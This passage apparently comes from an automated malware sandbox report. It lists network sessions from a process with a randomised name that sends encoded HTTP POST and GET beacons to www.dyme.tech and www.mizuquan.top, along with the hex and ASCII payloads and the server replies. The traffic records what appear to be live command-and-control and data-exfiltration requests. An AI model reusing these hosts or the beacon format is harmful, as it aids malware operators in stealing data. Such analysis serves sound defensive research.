                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 6e 4a 6c 4f 51 58 76 47 55 58 4c 77 39 50 36 6c 31 6c 31 38 56 47 5a 53 30 55 6d 33 72 78 30 45 43 7a 2b 4b 49 52 62 37 6e 36 62 65 77 69 70 71 6e 4e 6a 74 6f 61 73 77 34 4a 38 63 47 72 39 4f 67 66 56 34 78 43 2b 57 65 6c 6c 63 2b 68 54 47 46 55 47 6a 54 4d 76 4a 64 31 75 34 45 6c 47 6c 74 55 6a 53 78 69 48 76 74 45 32 32 50 62 4f 53 43 52 67 4f 73 61 31 73 63 45 31 51 2b 37 4d 39 51 71 4b 75 50 71 2b 74 35 34 70 5a 49 31 73 44 30 52 2b 43 70 4d 71 52 6e 4c 41 4f 63 35 2b 4f 53 72 31 41 59 58 51 68 4e 68 47 4c 59 3d
                                                                        Data Ascii: -NnllVvH=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DManJlOQXvGUXLw9P6l1l18VGZS0Um3rx0ECz+KIRb7n6bewipqnNjtoasw4J8cGr9OgfV4xC+Wellc+hTGFUGjTMvJd1u4ElGltUjSxiHvtE22PbOSCRgOsa1scE1Q+7M9QqKuPq+t54pZI1sD0R+CpMqRnLAOc5+OSr1AYXQhNhGLY=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.45003113.248.169.48802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:53.247423887 CEST10905OUTPOST /h7lb/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.dyme.tech
                                                                        Origin: http://www.dyme.tech
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.dyme.tech/h7lb/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 76 4a 6b 39 49 58 73 6c 38 58 4b 77 39 50 6d 31 31 6b 31 38 56 2b 5a 53 4e 54 6d 33 6e 48 30 47 71 7a 38 70 41 52 4c 61 6e 36 52 65 77 69 6d 4b 6e 49 74 4e 6f 50 73 77 4a 43 38 59 69 72 39 4f 67 66 56 2b 64 43 35 45 36 6c 6e 63 2b 69 44 57 46 49 4e 44 54 6b 76 49 31 66 75 34 42 51 47 52 5a 55 6b 79 42 69 46 36 78 45 71 6d 50 5a 4e 53 44 57 67 4f 52 64 31 73 42 37 31 54 69 52 4d 2f 4d 71 4c 72 75 73 71 6f 5a 66 71 50 6b 74 37 69 51 6e 2f 53 70 31 79 44 66 6c 4f 73 4d 4f 73 64 53 66 39 48 6c 61 4e 78 6c 59 52 50 48 51 68 77 70 76 6b 77 54 59 38 42 71 35 55 69 69 45 74 33 63 78 46 4c 36 2b 77 68 64 4c 4e 58 33 7a 36 57 74 74 4e 58 37 6c 30 44 59 59 6e 34 51 57 65 75 33 7a 62 58 68 68 61 66 55 31 7a 4f 45 74 6d 4e 49 4a 6d 6b 45 30 35 39 6a 78 61 46 36 6d 6e 4d 7a 6c 47 77 70 68 44 71 77 52 54 70 30 2b 4c 6d 6b 41 77 6f 51 46 53 6f 56 6a 37 48 59 49 67 [TRUNCATED]
                                                                        Data Ascii: -NnllVvH=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DMavJk9IXsl8XKw9Pm11k18V+ZSNTm3nH0Gqz8pARLan6RewimKnItNoPswJC8Yir9OgfV+dC5E6lnc+iDWFINDTkvI1fu4BQGRZUkyBiF6xEqmPZNSDWgORd1sB71TiRM/MqLrusqoZfqPkt7iQn/Sp1yDflOsMOsdSf9HlaNxlYRPHQhwpvkwTY8Bq5UiiEt3cxFL6+whdLNX3z6WttNX7l0DYYn4QWeu3zbXhhafU1zOEtmNIJmkE059jxaF6mnMzlGwphDqwRTp0+LmkAwoQFSoVj7HYIgamK9u2CKb5tcht6HltlpZeE79orTF5jipAbs3Iz1TULeC8/zak1bqwjO+7/thciCJx2o96RXw/fcTjl2+hgPGOjt0YPizGo1syqD8EhEL2KWQUZ5eytAR72dJ/hqaQOEcw2NHQmDhCSYbmU+MufFhVrmm5Ni3syWC7Y1xnpsVqNxVYpCDFffc9b4zPSZXBaN9VsmG/SCnLEyravEzbv9z50YzTL+C2b+uJVZYrg07UzBT2FBSHVRkcnThoxPNpR+VhHVRvsIbXMRVEWvKrCqdMD+Hq0UgToNxxaVUFiUMRC+uQBCbdvgUdOLthFW5s/w5oWLzHFEYRs8O6Phx3qmU86Jp5ai2MbQt+ZPwSmhwmjj5nYSzyvhdlSkxZ9yZ3XOszw7jEndhAvvSFxDSj1nkpADLAa5yyXfS9sRbSJIeshtGbLr4wROGZ4Bm8K9cdWmxTjShDiNCQv68IRs8ybT7dW6aPCPeEvi8DoyNTVj/wju93DoDHpIXFfXSP6ZosxPYUgEK94W9NfNhY5L03ElYuBenrheu+kKK/OxhP+oHGgUzDGY1bIBjJBQwX8GuBj4OAS3yfdtxKpqtdF+GlTUsb43qk/nFBr/cdupjDdXmPxUpCcKorUUi2OWm+9yru/pGHXwXupWhx9EjVqCK5tiM6/7eyYIb140pm [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.45003213.248.169.48802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:55.789122105 CEST552OUTGET /h7lb/?-NnllVvH=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.dyme.tech
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Oct 8, 2024 16:35:56.288558960 CEST404INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Tue, 08 Oct 2024 14:35:56 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 264
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 4e 6e 6c 6c 56 76 48 3d 52 62 50 48 61 4f 52 75 71 33 56 4c 73 49 76 46 45 2b 6b 53 34 31 33 35 73 48 4b 32 51 57 4b 74 78 55 74 43 6d 73 52 58 47 49 36 6a 79 74 59 64 33 57 56 48 41 79 67 71 73 67 39 6d 34 73 78 37 49 58 67 6c 6f 46 58 2b 38 47 2b 76 79 64 51 5a 4a 4c 50 30 56 2b 77 32 67 50 50 31 69 39 67 53 36 44 51 58 2f 36 4b 68 7a 38 45 42 61 37 34 50 2b 46 4f 6c 36 61 45 3d 26 65 36 6d 68 78 3d 4c 5a 77 78 50 4c 72 68 71 74 5f 38 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-NnllVvH=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&e6mhx=LZwxPLrhqt_8A"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.45003743.242.202.169802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:36:15.630598068 CEST812OUTPOST /e0nr/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.mizuquan.top
                                                                        Origin: http://www.mizuquan.top
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.mizuquan.top/e0nr/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 4b 74 58 63 32 31 38 6b 45 41 59 2f 54 6d 73 33 71 45 49 68 55 77 5a 77 73 7a 6b 77 72 41 6b 7a 54 5a 65 64 7a 64 50 47 56 7a 75 61 4f 37 4b 70 70 53 47 44 63 52 46 38 36 76 48 69 4a 64 42 47 63 42 32 5a 39 46 2b 45 32 38 30 63 34 53 46 34 4c 30 61 33 55 4e 69 51 52 43 47 50 2f 61 50 33 52 48 4c 75 36 6e 73 62 58 51 39 65 65 6c 77 58 61 64 74 30 6f 4d 36 50 53 37 45 4f 4f 76 48 6d 45 50 47 2f 55 57 53 4b 69 2b 6d 45 4e 56 41 79 6f 51 6f 50 4e 5a 4d 4a 49 66 4e 43 45 31 42 6b 38 53 53 67 51 55 78 59 59 77 43 59 42 42 44 2b 71 55 48 64 77 3d 3d
                                                                        Data Ascii: -NnllVvH=H9Rq2Rs7eYeiaKtXc218kEAY/Tms3qEIhUwZwszkwrAkzTZedzdPGVzuaO7KppSGDcRF86vHiJdBGcB2Z9F+E280c4SF4L0a3UNiQRCGP/aP3RHLu6nsbXQ9eelwXadt0oM6PS7EOOvHmEPG/UWSKi+mENVAyoQoPNZMJIfNCE1Bk8SSgQUxYYwCYBBD+qUHdw==
                                                                        Oct 8, 2024 16:36:16.502734900 CEST691INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:36:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.45003843.242.202.169802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:36:18.184499025 CEST832OUTPOST /e0nr/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.mizuquan.top
                                                                        Origin: http://www.mizuquan.top
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.mizuquan.top/e0nr/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 77 6b 39 58 64 65 50 43 64 50 4c 31 7a 75 49 75 37 50 78 4a 53 64 44 63 56 6a 38 34 37 48 69 4a 5a 42 47 59 46 32 5a 4b 70 39 43 6d 38 32 61 34 53 4c 37 37 30 61 33 55 4e 69 51 51 6d 34 50 2f 69 50 33 43 50 4c 76 59 50 76 45 6e 51 2b 5a 65 6c 77 61 36 64 68 30 6f 4d 59 50 58 54 75 4f 4d 48 48 6d 45 66 47 2f 47 75 54 42 69 2b 73 4b 74 55 42 32 6f 68 50 4e 39 4e 41 58 4a 2f 36 64 57 42 51 68 36 44 49 78 68 31 6d 4b 59 55 78 46 47 49 33 7a 70 70 4f 47 39 39 34 38 72 70 77 55 33 76 64 34 65 37 56 77 37 66 38 48 6b 67 3d
                                                                        Data Ascii: -NnllVvH=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w9wk9XdePCdPL1zuIu7PxJSdDcVj847HiJZBGYF2ZKp9Cm82a4SL770a3UNiQQm4P/iP3CPLvYPvEnQ+Zelwa6dh0oMYPXTuOMHHmEfG/GuTBi+sKtUB2ohPN9NAXJ/6dWBQh6DIxh1mKYUxFGI3zppOG9948rpwU3vd4e7Vw7f8Hkg=
                                                                        Oct 8, 2024 16:36:19.053726912 CEST691INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:36:18 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.2.45003943.242.202.169802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:36:20.728841066 CEST10914OUTPOST /e0nr/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.mizuquan.top
                                                                        Origin: http://www.mizuquan.top
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.mizuquan.top/e0nr/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 34 6b 39 6b 56 65 65 52 46 50 4b 31 7a 75 54 75 37 4f 78 4a 54 46 44 59 42 2f 38 34 32 38 69 4c 52 42 48 39 52 32 66 34 52 39 4d 6d 38 32 59 34 53 47 34 4c 31 43 33 55 64 75 51 52 57 34 50 2f 69 50 33 45 72 4c 70 4b 6e 76 47 6e 51 39 65 65 6c 4b 58 61 64 4e 30 6f 30 69 50 58 58 55 4f 39 6e 48 6e 6c 76 47 39 7a 43 54 64 79 2b 71 48 4e 56 53 32 6f 74 51 4e 39 51 7a 58 4a 4b 74 64 56 64 51 73 72 32 74 69 78 70 61 52 6f 51 6a 65 6e 55 33 30 36 6c 76 4e 2f 4e 6d 7a 62 4a 63 41 32 72 57 30 4e 6e 46 74 70 6e 4d 52 51 65 51 2b 73 31 74 46 6b 78 58 64 4f 66 57 74 71 78 5a 66 75 70 57 30 42 64 67 42 64 56 6b 56 67 62 38 54 30 56 4e 30 43 41 52 50 45 61 32 65 57 44 73 55 36 32 44 67 70 4a 35 37 6c 54 34 59 73 52 71 76 51 62 42 55 2f 4b 57 46 69 38 46 35 41 2f 32 46 52 66 50 65 49 71 62 69 65 47 41 66 2f 6a 75 42 35 2b 41 44 54 48 45 6b 79 45 59 6c 51 39 76 65 [TRUNCATED]
                                                                        Data Ascii: -NnllVvH=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w94k9kVeeRFPK1zuTu7OxJTFDYB/8428iLRBH9R2f4R9Mm82Y4SG4L1C3UduQRW4P/iP3ErLpKnvGnQ9eelKXadN0o0iPXXUO9nHnlvG9zCTdy+qHNVS2otQN9QzXJKtdVdQsr2tixpaRoQjenU306lvN/NmzbJcA2rW0NnFtpnMRQeQ+s1tFkxXdOfWtqxZfupW0BdgBdVkVgb8T0VN0CARPEa2eWDsU62DgpJ57lT4YsRqvQbBU/KWFi8F5A/2FRfPeIqbieGAf/juB5+ADTHEkyEYlQ9veWf+0fV2P0C/dLqHL8X3VRdkKD4GBBl4/ao7EgXLQTAPHjEtiMyRCe1lSH3Rl/D64A0UZes7X8BMp/9FxRadrZtXFsuBUW+st3s9aUZHsKdna3N47CEN1QD23l1Hhk9yQf7o0+TaQS4FNQywn33ur7oyOWgdLaWrlrkrwD0wSMt1dehXpLtMxgfHbe1sJ4DaEkxmRvc8697CtdYOzZtkA7BODAHN0MdbY0pNRDC+hjhVJUFjTpGyy2S/Ufh/dsohklDjDWxgv9d5yq8SvaKl4ia98lNodu1NWZpzQTIUv9PKG91/ls7vUSBUtrsYFOJl3of4569WgA7+JNjwd1H3myycp0vLSOZJhb/UnV35WiXCLBBbB+wQiv6g2KsMKku8rdW5olPbZpayhkHB4+d6hbUmn1/usoHQ67OEh+YwtJttQWz/yBqvtrrAB4PQ0UmSTFeP0uGijrJXuPWoSS6BY+eyNeeEAK0RkW74d043jEe26AFeSM7B2lMrwPE8BQUDdd7CXzAWLCWLvVeFq6w4RjiGW0jV0bQdnuZ02quQeO0KePZDP7TuotR94aVnG5B4zjiaK0LXnMf8Y8wj77197iyj4bdXiTz5RY/ANMbjocOhY3KNWCmJEbiPJuu4ITO0ZtDEFZy72i7+d1wkdsPE+Er/sbFK+fFaLrl [TRUNCATED]
                                                                        Oct 8, 2024 16:36:21.606004000 CEST691INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:36:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.45004043.242.202.169802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:36:23.290067911 CEST555OUTGET /e0nr/?-NnllVvH=K/5K1kUHGJjjXPw2ZEkIjVgmoRaszrgI6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txK3JHWMG30o4pyFBBCDSCP6CBkBrnoqSCbT0=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.mizuquan.top
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Oct 8, 2024 16:36:24.174876928 CEST691INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:36:24 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

